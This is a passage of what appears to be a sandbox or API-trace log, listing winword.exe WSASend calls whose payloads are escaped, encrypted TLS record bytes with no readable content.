396. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xc4\\x1f9lk\\xf9\\x15\\xb2\\xae<fj\\xef-l3!\\xf4,\"\\xd8\\xd6z0\\xa5e\\xd3\\x98u\\xaf\t\\x8f\\x0b\\xf9\\x9c\\xcc\\xe6\\x9f\\xb2\\xd6\\x97q\\xa7\\xbc \\x0f\\x87\\x12\\x91z\\x1b\\xb7u\\xb9ypqc\\x069\\xf7\\xc5\\xaf=d\\x0c\\x08!\\xd1\\x12b\\x80o`\\xbbi9\\x19\\x1c\\xd7,\\xe8\\xc2a\\x01\\xa32\\xd0in\\x91n\\xbf\\x99+\\xc2\\xa9c7\\xdb\\xe7h\\xd9\\xe9n\\x1e\\xe0\\xe4\\x80\\xef\\xba\\xba\\xce\"\\x1f\\xd7+\\x04'\\xa7\\x94\\xc9\\xf0\\x87\\xc0\\xfdr\\x95\\xacu,\\x8b4\\xbcc\\xd7\\xcd\\x13\\xf43\\x925\\xd4i\\xc3u\\xc0\\xe4\\x814n\\xe1x\\xc8v\\xcf\\xa2\\xfeh\\xdfs\\x8eq<\\xad\\xcc\\x8a=\\xf7,\\xd4?r\\x0e\\x0f\\x88;_\\xfdh\\xbc\\x9a\\xbf\\xe4j\\xe9g\\x80\\xcev\\x83\\x01\\xe6\\x93\\xd9'\\x1c\\xb9b\\x7f\\xa4t\\xc1\\xbd\\xe7\\x983v\\xe9t\\xf7\\xde&\t\\x88\\xaaz6\\xb5n\\x13\\x01\\x9c;\\x88\\xb0\\x93\\xd3w\\xe4\n\\x86\\x85\\x00\\xc5y\\xe50\\x83*\\x92x-\\x930$0,"
397.  
398.  
399. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0105\\xcb%\"w\\x0c\\xc3\\xd6\\x14\\xab\\x9f\\xc7;\\xc3q\\xd7\\xc5\\xba\\x16\\x87\\xd9\\x1e\\xc06\\xd5u\\xde\\x9242\\xb3\\xfe\\x13\\xce\\x07\\x88y\\xd7\\x11\\x0f\\x07\\xab\\x95\\xeb\\x98mgd\\x84\\xaf\\x9aoz\\xa6%\\x14*0\\xb1d\\xfd\\xbc\\xe5\\x05\\x8b\\xd4\\x01\\xe0\\xd8\\xaa\\xce9\\xbc\\xed2\\xcau\\xdc\\xe1\\xa8\\x1d\\xc1#\\xd1\\xf5h\\xf1\\xa9af\\xeb\\xa0\\x82\\x8f\\xa4\\xf0\\x9b\\x16t>\\x90\\xef\\x15\\x1a\\x9e)!mm\\xf8\\x8ba@^g\\xf8\\xa5\\x13\\xfa\\xbae!\\\\xa1a\\x9a-\\x03\\x87\\x7f8l\\xc5\\xf8\\x1a\\x9d\r\\xa0\\xf5\\xe6q\t<c\\xde\\xce\\x11=p\\xc2>,(\\xc1j\\xa2hljn\\xeb\\xbf\\x97\\xc1\\xe4\\x7f%\\x90d\\/\\xb4\\x8c\\xe3\\x16\\x9c\\xf6\\xe8\\xed\\x17\\x90v1@\\xd8\\x17\\xc0\\xbdlw\\x9fxg#\\x95\\xa3\\xad\\x1a\\xbe\\xf2\\x1f\"\\xaa\\xd3\\x91>\\xb1\\xceb\\xe4\\xba\\x04q+i\\xd6\n\\x0b\\xe57\\xe78u;<\\x16\\xd0\\xcac\\x96\\xba\\xde\\xc8\\xeb&\\xda\\x88\\xf3\\x95\\xb7\\x7f\\xf1b\\x10u,"
400.  
401.  
402. "http_request": "winword.exe_WSASend_\\xc4\\x00q\\x00p\\xb3d\\x0f\"d\\x90-!\\xaf\\x97\\x1d\\xf7i&\\xf3pr\\xea8\\xc0\\xd0\\x0f\\xf5-\\x0e\\x8ax\\x8a\\x9d\\x8bet\\x91kqjl\\xc4\\x91.\\xd1k\\x1b\\x98b\\xd5\\xc2*\\x0br'\\x89\\x97<\\xe9\\x04\\xe956g\\x9fy\\x83\\xa01\\xafrz\\xef~a\\x1d\\xd7np\\xd2\\x10ys\\x02>\\x9ed\\x8f\\x07\\xf3\\x11\\xdd\\xbd\\xd0w\\x02\\xb5;\\x936\\xcb\\xa1;zw\\xfb\\xc1\\xf8\\xf3\\xf2\\x17\\xden\\xe5od\\x14\\xd7\\xfb\\xa7>\\xd5\\xd0\\x1969\\xad\\xb0\\x11\\xaa&w\\xe6\\xcb\\xb5\\x9d\\xdf\\x8ak\\xfc\\x9a.j\\x8f\\x1b\\xfbgr\\xd4-\\xd01_\\xc3\\xf4~\\xd47\\xaegb\\xfe\\x11\\xa9ohh\\xaf)\\x91\\x10\\\\x00tv\\xfb\\x9cj$\\xf0g\\x07\\x16\\x86e\\x86v\\x911ds\\xf8\\xe7\\xda\\x91\\x8a\\xb8?\\x8d\\xf6h\\x92\\x89\\x9f\\x19\\xeb\\xe3\\xd4&\\x06\\x97\\x84\\x14\\xe3\\xc8x\\xd5g7\\xda\\x1e\\x98\\xd7\\x86g\\x83\\x96\\x94g\\xcet\\x1f\\xbe\\xd0\\xe1\\xfd\\x1b\\xef\\x1a\\xd0bz\\x8e\\x1c\\x85q\\xf5\\xbb\\x90\\xc1\\x92\\xe17"
403.  
404.  
405. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xcde\\xeemr\\xa1>\\x14\\xc0\\xb0\\xddn\\x86\\xd0\\xfa\\xb8\\x94\\x8eb1\\xc4*\\xf1\\x03\\x13\n\\xaac\\xdc\\x1f3\\x0e\\xe7\\xc2\\xf1*p\\x85\\xaf\\x9f\\xb8@\\x9ec\\xc6\\x93\\x1d)\\xc78\\xb5b\\xa0\\x1e\\xf4\\x11\\x16a\\xa4\\x06\\x99=\\xe1v%6~\\x9e.mk\\xc4\\xe6\\xa9s\\xd9\\xb9\\xe5\\xb6,\\xd0\\x9d\\xd9\\x84\\x86\\xbb(\\x92\\xc2\\x19\\x98\\x1d\\xd8k\\xa6\\x9d\\xdd\\x0c\\xab\\x92l\\xab\\x8am%\\xb4\\xfc=cu\\xf9>i.\\x9d\\xd0\\xaa`\\x9e\\x9d\\xb3\\x1a\\xb08\\xff\\xc7\\xbe!\\xdbb@\n\\x87\\xc4p\\xea\\x9da\\x01\\xa4hb\\xccx\\xd2\\x8b\\x91?\\x1a8\\xcf\\x07?\\xc1\\x83`\\xd7\\xdd\\x0b\\xbd\\xf4>6\\xf6\\x1fp\\xa2\\x01\\x0f\\xfeu\\xe5\\x8eeiw\\xfa\\x80k:\\x94w\\x97ji\\xf9\\xf1\\xd2*\\x8e\\x973\\x0f\\xa68;\\xd83q\\x02%z72q\\xdc\\x91\\xae\\x1dp\\x06&\\x80-\\xb8\\xda\\x9c\\xae\\xfez\\xd4&\\x1c\n\\xffp\\x8cpa\\xbf \\x91\\x8f\\x19\\xe3?\\x16\\x96\\xf6n\\x82\\xcf\\x89\\xb8\\xd8%8\\xa3"
406.  
407.  
408. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010+\\x05\\xbf(bx\\xed\\xc3\\x0f/\\xb9\\xf2n\\x0b\\x9a\\xd4\\xc1\\x11\\x18\\xfc\\x8a\\x1f\\xfd>\\x85\\x93`\\xbb\\xa4u\\xd1\\xda\\x97cd\\xfa\\xef\\x9c\\xb7\\xb1\\xf0\\x01cg\"\\xd4\\xb0\\xb8@\\xcdj\\xb9\\x00\\x8e\\x99\\x9c\\xbd!'\\xc4\\xfd\\xd8z7\\xe5,e\\x00\\xea\\xb4\\x84\\x08\\xea\\x96*\\xe4\\x98p\\xe9\\x1b/\\x1a/\\xc1\\x98\\xb6\\x1a\\x15\\xa0b\\xd0\\xd6\\x0bv\\xe0o\\x89\\8\\x08kk\\xf8\\x02x\\x1f\\x92\\xd1\\xeeq\\xfe\\x0cs'\\x0f\\xc5\\x85\\x13en\\x83\\xe6\\xe2\\x94\\xc6h\\x085c\\xe1\\xb9\\xe0\\xe7\\xb1\\xbc~\\xfd\\x167b\\xcb\\x82*\\xf8ky\\x02\\x99\\x16\\x1b\\xec0\\xec\\xf1\\xca\\x05\\xe7\\x9a\\x17j\\x88q\\x94y\\x171\\xb9p4r\\x12\\xfd\\x0f\\xc74\r\\x92\\xc6u\\x14r\\x86\\xd2\\x03\\xd5\\xb5\\xdb\\xc3@\\x05\\x95\\x12\\xed\\xa2`=\\x85\\xe4\\xdf\\x80\\xc9\\x1e\\xf7\\x95\\x9a\\x85\\xb7\\xef\\xfdh~\\xa0\\xa0\\xe2\\x02a\\xac\\xdc\\xc0\\xdf\\x12\\x08\\xd7\\xa4e\\x9ah\\xa7y.s\\xc8\\xc4\\x95\\xdc3\\xc1\\xf6_n\\xe5&\\xb6\\x05p\\xa1\\xbe\\x85"
409.  
410.  
411. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x8f\\x89\\xd7\\xde\\x18\\x16\\x93\\x12\\x1fv%9\\x00u\\x9e\\xf2\\x08\\xd3\\x11\\xd1'^\\xcd\\xd24\\xd5\\xd7\\x91<\\x03\\x9b\\xca\\xfdd\\xcf\\x16\\xe5z\\xde\\x0bi\\xf4\\xea\\xc1\\x12\\x02\\x02\\x1d\\x16\\xe6\\x1dd\\x1d\\x96\\xa4h\\xe8\\x03alzcb\\xd9\\x88\\xca\\xeb\\xb0\\x87\\x97\\xeb:gd\\xa3\\xe6\\x13\\x0ed\\xb82\\xd9\\x1e.\\xa6\\x0e3\\xeb\\xc2\\xf0\\xf5\\x18\\x90\\xfa\\xa0\\xb1\\x87 \\xed\\xb7\\xa6\\xb1\\xcb\\x05u\\xe4\\xde\\xb5\\x1ab'v\\x85\\xb4\\x9eqm'\\xb2\\xeeu\\x9a\\xa9\\xce\\x19\\x10\\xaf\\xb4\\x19|<!\\x11f\\x04\\xc0\\xf6\\xb8\\xf6\\xadp\\xdc\\xb4+\\xa4m\\xe2\\x12 j\\xc9d\\xd1\\xffb\\xf5\\xa1\\x18 \\xec\\xf5\\xde\\xd0\\xb47 \\xc7v\\xb1&\\x91\\xd1!\\xd9\\xc9\\x8c(\\xe3\\xaa\\x96w\\xd96\\x0by&\\x0e\"\\x0b\\xf2\\xc7\\xa1\\x8e\\xf3lf\\xc1^\\xd9!$\\xebg\\xbd\\x0e\\xc3\\x9cs(\\x0bf\\xe3\\xddnu\\x0c&\\x1b\\x8dx\\xc2\\x85\\x1f\\xc80\\xb1\\x8f#\\xd7\\x93\\xedd\\xb3\\xb1t\\x86\\xcbx\\xd9\\x85\\xd4\\x00nw\\x93't\\xe3\\xea\\x0e"
412.  
413.  
414. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\"\\xea\n\\xc0g\\xcc\\xaeoj\\xc5\\xf8\\xb0\\xc9\\x1c\\x19u\\xe52\\xd9v\\xe6\\xa9:/\\xf3\\x16\\xd4\\xcb\\xff\\x98\\xed\\xd6\\x91\\xf0z\\xdf\\xc5\\x9f\\x0e/\\xcbh\\x12\\x8f\\x01\\xfbk\\xc3\\xae;\\x06\\x83\\xe5j\\xb0\\xa8\\xe6ih\\x1fu\\x04\\x02h\\xff\\x9f\\x96\\xb1\\x82e)r\\xdc\\xf77#\\xc7pl5_\\xd2\\x88$\\x07\\xca\\xf4\r\nw\\x0f\\xbd\\xc9\\x1b\\xf7\\xf1\\xcd\\x89\\x1f\\xadz\\xe8\\xf4\\xf1\\x81\\xdeq\\xbf,'l`iu\\x85\\xaa\\x11\\xb0\\x8b\\xb1\\xd1h@\\xca>=pye\"@\\xb3\\xff$p\\xec\\xff\\xb8y\\xba\\x0f\\xb3\\x9fzl@\\x11\\xe6t\\xd9\\xc0\\xe0\\xe6g\\xe0n)\\xbe\\xd4\\x1ew\\x8c\\x1fy\\xa7\\xe7\n*7\\xc2\\xc2|(\\x14\\x81\\x85\\xee'\\x98\\xb0\\x96g\\xdcw\\xa9\\xb6\\xb2\\xc0\\x97\\xae\\xc7\\x08c\\x92\\x06\\xd0`\\x03n\\x8dy\\xe0y\\xb49\\xdb,\\xaa\\x93\\xd8\\x039\\x9b4g\\xf1\\xdb\\x88\\xb5\\x8c\\xefkze3\\x85|\\xca;2y\\xd9\\x91ul\\xfe\n\\xb0\t\\xe0t\\xa8\\x86p\\x08\\xf7\\x1c\\xc7"
415.  
416.  
417. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa9nu\\xad\\x00$1q\\x96\\xe44'wd\\x00\\xa0\\x90\\xf8b&\\xb1\\xf8\\xc2t\\x87\\x9f\\x9e\\xb4\\xd2m\\xa5l\\xf6dw\\xe2r\\x10t/\\xf1?_\\x83\\x17\\xda\\xe1l8\\xbb\\xe3\\xeed^:\\xbcd\\x84\\x7f\\xee\\xf9\\xf9\\x1b\\x19\\xc1\\xd7\\xd8\\xe9'\\xae\\x8a\\xd5\\xa1\\xe1\\x9cf1x\\x7f\\xf5\\x1b\\xc8\\x0ed#h\\xdc?\\x99\\xb0j\\x00=q=vml*\\xfa#\\x1cg\\x1a\\xdc\\xf0/c\\x8a\\xcb\\xe56\\xa4\\xebw\\x18n\\x1b\\x15d\\x9bb\\x90\\xe8$\\x9b\\xe5\\xf2>me$wde\\x85p\\xb3\\xc5\\xcem\\xaeg\\xaa\\xbf\\xc9vh\\x7f(\\x96e%\\xa1\\x82\\xca\\xe3\\x90\\x91\\x02\\x12d\\x08\\x16*o\\xba\\xdb\\xb9\\xafw\\x08\\xf4\\x17m\\x9fa\\xd7\\x95\\x8f\\x07\\xe2~\t\\xcb\\x01\\x94\\xfd\\xf8\\xff=\\x1cx\\xde5(\\x88:\\xd5\\x8f\\xbf\\x13\\xb3\r\\xf4\\x1f\\x0c\\xba\\x9f\\xc0\\x0cjv\\xb8\\x88x|\\xf8\\xb6\\x1ah\\xfa\\x10\\x8bq\\xdf\\xfd\\xee\\x95s\\xb2\\x12\\x83\\xdd\\x8ae\\x87!b\\xb7k\\xa3\\xd4wf\\xaf\\xfc\\x84"
418.  
419.  
420. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb3\\xe7h\\x84u_\\xa0\\x81t\\x9f\\x82f\\xdc\\x8dw\\x9d\\x98\\xd6\\x18\\x85\\xdf\\xa1).\\xc7\\xc5q\\xcd.\\xb1\\x12\\xd4\\x9e\\xc8\\xff\\xed\\xff<\\xaf|\\xce\\x83%\\xb9?\\xbb\\xa4\\x10\\x19\\x169\\xcbg\\xc1\\x12\\xa4\\x15\\xdd\\xcce\\x1d\\xc8\\xf2\\xd7,\\xeb\\xbf\\xe3\\xdc\\xe1\\xcb\\xf3\\xf0\\x8fv-\\xce\\x9e\\x9e\\xfcp\\xafszv\\xfd1\\xc9\\x05~\\xf0z5'x\\xca\\x96\\xdaa\\xbe\\xb5\\x92\\xb4\\xdb\\xe6\\xef\\xe4u> \\x0c\\xab\\xe1\\xcdq\\x0f\\x91/\\xbd\\xa0\t,\\xaa\\xc2u\\x8f\\xea\\xaeg\\xae\\x931i\\xac(<rng\\xbc\\x1b7\\xae\t\\x8f\\x8b<`\\xf1dt\\xd5\\xf1\\x94\\xb6p\\x8dgo\\x10\\x0ec\\xb8\\xde\\xdad|\\xff\\xf1\\x9ep\\xdfv4\\x1e'\\x98z\\xf5\\xe6\\xf9z\\xebj6s\\x8d\\x9e0)+5\\x9f\\xd8d\\xf9\\x1f3\\x12\\x1e\\xd2\\x14\\xdd\\xd0\\xb5\\x16h\\x9a\\x81\\xce\\xaa\\x8er\\x02j\\x9b\\xdb\\xf6\t\\xeb\\xa8\\x89\\xe3\\x90a\\xb1\\x1e\\x07\\xa12\\xa9)\\xc1\\x0e\\x0f\\x92^\\xa3s\\xc3\\xf5\\xa4\\x95\\x8c\\xd1\\xb9,"
421.  
422.  
423. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010,\\x82\\xed\\xd2g\\x0e\\x18\\xe5\n\\x14\\xfa\\xcb\\xc0\\xcfbx3\\xf0\\xbe\\xd7\\x08bp\\x16\\xd3cnv\\xd3b\\x0f`a\\x15\\x00%\\xc9\\xbb\\x84\\xf3\\x10\\xd84\\x17\\x90\\xb1\\xd1i\\xf4x\\x99\\xde\\xc8\\xc5\\x94qh\\xd4\\x19ps\\xba\\xd4\\xd9\\xc9idu-\\xf4\\x01\\xffy\nr\\xbez\\xddu\\x13%\\xa9\\xe3\\xe9\\xach\\x84\\x1c\\x91\\xa6\\x1e\\xd67\\x16a\\xfd\\xfb\\xc6\\x0c\\x10\\xc5\\x99\\xca\\xef\\xf4b\\xeai\\xf5\\x8fj\\xef!\\x1f`l\\x9c\\x81:\\\\xf3\\xac\\xb3c\\x9e\n\\xa0\\xfbf/0\\\\x8cx@p,\\xe9e\\xe5\\\\xd0\\xdd\\xa9p\\x12\\xe8\\x8b\\xb8\\xbb\\xbf\\x90\\x98j\\xcf\\xd4\\x0f\\xcc\\xc3\\xe6\\xe7\\x1bk?n\\xa9\\x9e\\xba\\xab\\x86\\xc1\\xc2es\\x84\\xa3$\\xac1\\xf6j\\xfd\\xab\\x83\\x82\\xb8\\xf5\\x12\\x99\\x19\\xc2\\x14oo\\x1dx\\xed\\xfbdz\\x08pi\\x1d\\xce\\x991\\x11u\\x95\\xf4~\\xff\\x87\\x8e\\x8a\\x1d\\xcd\\x03k\\xe5c@\\xc4y\\xd9\\x19t~,\\xb0\\xf45m\\xa7\\x0c;i>h\\x88\\xe3\\x0e\\xd1h"
424.  
425.  
426. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb8\\xc5\\xb5\\xae|\\x00m3;\\xc0\\xb6e<\\x13\\x96\\x0f\\xa8%\\xb0\\xb2\\xd9\\x8b\\x82\\xd0\\x9b\\x98\\xc4q\\xe0\\xb0\\x93p\\xd5j\\xa9x\\x81\\x17$3\\xe9-\\x9b\\xf0\\xcab\\x93\\x0e?h\\x0f\\xe7\\x10\\x18=\\xdc\\x95wzckl\\xa4\\x86\\x05\\xefh\\xbf\\xf2\n\\x82e\\x03f\\xc0eo`\\xd0hf\\xd0\\xea\\x18\\x88\\x00\\xa6\r\\xec\\xca\\xf1u\\x1f\\x0f\\xa6\\xf7x>j \\xce7\\\\xd4b\\xa2\\x7fu)\\x983\\xc1\\xf8\\xc3\\x93r\\x13\\xc5\"\\xa2\\x99\\xed\\x9ah\\xe8\\x89\\xe5;\\x99i\\x8b\\x94\\xdb\\xe8\\x89i\\x91\\x08rm/\\xba\\xc5z\\xf4\\xed.\\xa0\\x1fx\\xfd\\x7f\\xab\\xc9\\xa1j\\x05\\xe6\\xa8>\\x8a\\xf0\\xc5\\xf5\\x1e)\\xda\\xdc\\xb1\\x9a\\xce\\xe5\\xc9\\xc9\\x8a\\xa9l\\xf59\\xbcagwl\\xe2\\x18c=\\xe5\\x9dl\\x81\\xa6\\x8d\\x01z\\xbf\\xbc\\xe0\\x08\\xe8c\\xa6$\\xbb\\x9a\\x1cq\\x04\\xd8f`i\\xbdz\\xce\\xf3ttj\\xf4\"\\xf1\\xe0x\\x07fq\\xe1\\x0f\\xde\\xe8\\x16\t\\xaci4v\\xaew\\x17ft\\xf6\\xa0\\xfd\\xbe"
427.  
428.  
429. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x0b\\xba\\x89\\xc7\\xef\\xbf\\xcb\\xd5\\xc3\\xe3 :\\x9f\\xbe\\xd3\\x0f@\\xd1\\xdb\\x0c\\x1a\\xd1\\x15\\xae\\x85\\xce\\x88\\xc8\\xe9c\\xf5\\xc8s=\\xba$,\\xc6i\\xa4\\x9e`\\xc0\\xf6\\x8f\\xc26c`#\\x83\\x9fj\\x1cd7\\xc4\\x87\\x89\\x81\\x8a\\xaed\\x14r\\xcfn\\x90^l\\x8fx\\x11,\\xae\\xa1l\\xa36f\\x9flo\\xbfy\\xa2\\xfc\\x1f\\x93\\xe1\\xeb\\x17:&\\xb9bhuf\\x13\\x13q*\\xf2\\xb2\\x13\\xa7\\x85\\xe0\\x7f\\xec\\xbb\\x94\\x98\\xa6\\xc4\\xe9\\xf4\\xf6\\xf4x\\x90\\xb79\\xac\\xb1\rf\\xe9\\xc8ww\\xf8%>\\x89\\x95\\x7f|\\x00`\\xbf\\x8f:\\x1d\\xd6\\xc0'.s\\x1a@m\\xe5\\x17\\xf8(\\x8a\\xed\\x98l\\xa6c\\xab6\\xbb\\xca\\x04mg<\\x01\\x9f\\x99;lq#\\x8a6\\xf2\\x80a\\xef<p$\\xbf\\x84\\xaf.\\x89\\x8b\\xb6\\xe5r(\\x8d\\x97\\x86\\x0e\\xf2\\xf3qk\\x9e\\xecz\\xcbr\\xcb@\\xcd\\xf3\\xff\\xe5l\\xb5\\xb4\\xe0y\\xb0\\x00\\xedr\\xb0\\x16\\xe2w\\xfdum\\xd3\\x99u\\x01\\xdc\\x1d\\xab\\xbe\\xdeh\\xb2$\\xad\\xa8a"
430.  
431.  
432. "http_request": "winword.exe_WSASend_~\\x01\\x01\\x00f\\x10\\x00\\x00ba\\x04ws\\xa0\\xa1\\xd9\\x16_\\x02\\x9e\\xbe2\\xbc\\xad-k^?\\xfa\\xa95\\x99\\xbc\\x18a\\x81-\\xca\\xec\\x8b\\xbc\\x05a\\xb9g\\xdc<<\\xc2p\\x06\\x9c\\xff\\x88\\x89?\\xd3^i\\xdb\\xa4k\\x8c\\xd9\\xd6z\\xc8<c\\xc7\\x9a\\xc4\\xc8\\x93\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1ci\\x08(\\xa6j\\x05\\x1d\\xc8t8\\x849\\x99ss\r\\x04i\\x83\\xa4\\x90\\xbc\\x85\\xc2\\x0b8\\x81\\xe2\\xc2\\xe7\\x81\\x16\\x8e\\x80\\xb5\\x84-\\xc2\\xe5\\xed\\xdb\\x87\\xf5w\\x86\\x04"
433.  
434.  
435. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc2\\\\x05\\xeb\\xc8y\\x97\\xcb#\\x14\\x9aneaa\\xf1g\\x8a\\x04\\xbc\\xa8\\xc2onm\\xc95a\\x08\\xb83v\\xcb\\xd8\\xea*\\xd3\\xcd\\xf9^\\xdbif\\xb7\\xf6\\xeev\\x04\\xeb$i\\xf5c)\\xe8\\xe8\\xbc\\xbb\\xe8\\x01(\\xa9\\xeay\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xf4\\x14\\xe8:\\xf3x.w\\xc5m\\xd7\\xb1e\\xc6p\\xa2\\xb7y2\\x15\\x9d\\x95$&\\x05\\xad\\x8e1\\x07?\\xb2\\x13\\xd3zv\\xd7\\x8f\\xd0\\xdb's'\\xd9rd\\x89\\xad"
436.  
437.  
438. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd0\\xfb\\xde\\x87\\x16p\\xfco1\\x16t\\xc1\\x88\\xb4\\x95\\xee.v\\x0f\\x10p\\xc3\\xb6;\\xc8c\\xe4\\xe2\\xfb9\\xaaubp\\x8020s\\xe3\\xd8\\x90<k\\xeber\\x86\\xb4\\xf6\\xd0p:r\\x0f+\\xd7\\xba\\x84\\x83;\\x866\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x04\\xfa\\xf3\\x7fu\\xef\\x98\\xb6\\x03\\xcc\\x13\\x06\\x87k!\\xd1^\\xd4\\xf8\\xbf\\x10\\x06r9\\x9eeh\\x1d\\xcd\\xad\\xae\t\\x99k\\xd1g\\x82c\\x0e\\xcbt\\xfe\\xf28\\xeb\\xd1\\x9d"
439.  
440.  
441. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04n\\x0b\\xe3t\\xc5$\\xabp\\x8d\\x12\\xc0y\\x941\\xb0l\\xfar\\xeah\\x17\\x86\\xfc\\xd5\\xe4w\\xee\\x0b\\x7f\\xb8x\\xfc\\x00\\x13\\x8d\\xa10l\t\\xe1\\x84\\x05\\xce@_\\xab\\xaa\\x07~\\xf6\\xdd\\x05\\x18e\\x9bo\\xe9\\xc6\\xfc\\xe1\\xaa\\xa7\\xc9\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa3f\\xf7\\xee\\x0c\\xa7z\\xa6t\\x12\\xa3\\xc6\\x92\\x16\\xba\\x01ex\\x06\\x89\\xb9\\xfea\\xeb\\xd1-\\xbc\\xff\\xde/\\x91\\x82\\xa7\\xd8\\xe3\\xc0k\\xe2\\x90\\xe4\\xf1\\xcc,\\xb6\\x10\\x13\\xb0"
442.  
443.  
444. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xa3n\\x8b\\xe5y\\x02\\xce\\x03\\x00\\xa8\\x952\\xfe\\xe5j\\xc1\\xa6u\\x86\\xb1.z+w\\x90o\\x9df\\x87a\\xc0\\xab\\x0c\\xc9\\x91\\x87\\xfb\\x01=\\x1b\\xb2\\xf5\\x7fsuv\\xe3kv\\x1a\\xaf\\xadv\\x94\\xeb5ww\\xff?\\x9f\\xaa\\xf7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfer\\xe31y\\xda\\x81\\xdb\\x8e\\xdb\\x13b u\\xe8z\\x05\\xc2\\xfbm\\xafe\\xdd,\\xd0\\x96\\xc0\\xf7\\x00\\x0e_\\x9b\\xab\\x92\\xc0\\xabu\\xe6#/\\xb1z\\xa8/p"
445.  
446.  
447. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xefrv_\\x1b\\x8b\\xf7\\xaf3\\xf7\\x18\\xfd\\x81\\x83\\xf6\\xde\\xba\\xc3.\\x7f/\\x19@\\x02\\xc5\\xf3\\xf33\\xb9\\xa8z\\xf4t\\xf5\\x9e\\xff\\x1da\\xa8\\xd9\\xb8\\x03\\xf7\\xa0\\xe2n\\x97\\xf6\\xe5m\\x003(w/o\\xb7\\xa0\\xd4+=\\xb7\\xc57\\xb3^\r\\xb5`\\xd9\\xd2\\x92f\\xf3\\xa3\\xef\\x03\\xfe\\xc7\\xce'!qs4p\\x006\\xb9\\xe8\\xc7\\xea\\xaf\\x13^\\xb0\\xdc\\x15g1\\xbf\\xb5\\x1d\\x01u;\\xe0c6\\xa7\\xe5\\xc4n?9\\x16avov7)^\\xc6\\x02\\xf5/\"v\\xf3>\\xe3sv\\x1e\\x87\\xe7\\xf5\\xa2j\\xe6\\xa0s\\x9d#\\xc3\\x9b\\x85\\x82h\\x90r\\xce\\x8f\\xba\\x0cdsva\\xe02z\\xf1\\x81g\\xb4kp\\xa4\\xf8l\\xe7\\x9f\\x10\"\\xb1\\xd5\\x9a\\xeak9\\xb2\\xf4e\\xa7m\\xd9\\x86\\xb8\\x95>\\x04\\xc1r\\xa5\\xc3\\xbax\\x0cayb\\xa8\\xf0\\xa2v\"\\xdao\\x08\\xb1\\xfbb\\x9f\\xd1\\x0b\\xfc\\xd1\\xb8\\xce\\x9e\\xe3~\\xe8%\\xf2\\xe3\\xc6)i\\x84-\\xc0\\x06\\x96j\n\\xea\\xf1\\xab\r\\xa2i\\xf08\\xe7\\x8c\\xcb"
448.  
449.  
450. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04:ho5\"\\xfcm\\xa8\\xc7\\xd8\\xfc\\x1c9\\x1c\\x9d\\x80\\xda~\\x8b\\xa0m\\xe7k-0\\x03\\xab\\xdf\\xf4\\xa1\\xd7<\\xbb\\x1a`k\\xd68\\xd7\\xa5\\xbb\\xf9\\xe4\\%\\x0e\\xee\\x0fmi\\xbea\\x81g\"z\\xb9\\xd7\\x14g%3\\x88\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\"\\x91\\x8b\\xee\\x02i\\x90p\\xdd\\x07tc\\xad\\x1bf|\\x01`\\xdb\\xbd\t\\xc1sz\\xe6\\xf3\\xd3|`\\x1fv\\xfer\\xe6\\x8b\\x9by\\xc6\\xb4\\x96\\xf9x\\xa2\\x00\\xc8\\xcf\\x18m"
451.  
452.  
453. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x96\\x06l\\xfd\\x0c\\x12,\\x8a\\xff\\x93\\xdb\\xfc%\\xbdc\\x8d\\xab\\xa5\\xe8\\xb8\\xed\\xe3%\\xa0\\xc05\\xfc\\xb9\\x80\\xfe\\xdbo\\xb6'yj\\xc0\\x02zi=\\x15tt\\xe8\\xe5#\\xf3f0\\x07\\x96\\xb4\\xb9\\xe1ox\\x11n\\xfbv'\\xc0\\xb5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000/r\\xbb\\x91\\x1cae\\x83x\\x1ahi\\xc6\\x82|\\x1f\\xe1|\\xe3a:\\xa8\\xf3\\x85\\xeeg\\xc0%\\x8b\\xdfc6\\xcdt\\xeb\\xc2h_\\x0b\\x9d\\xf5m\\xcb-\\xd1\\x07\\xa2"
454.  
455.  
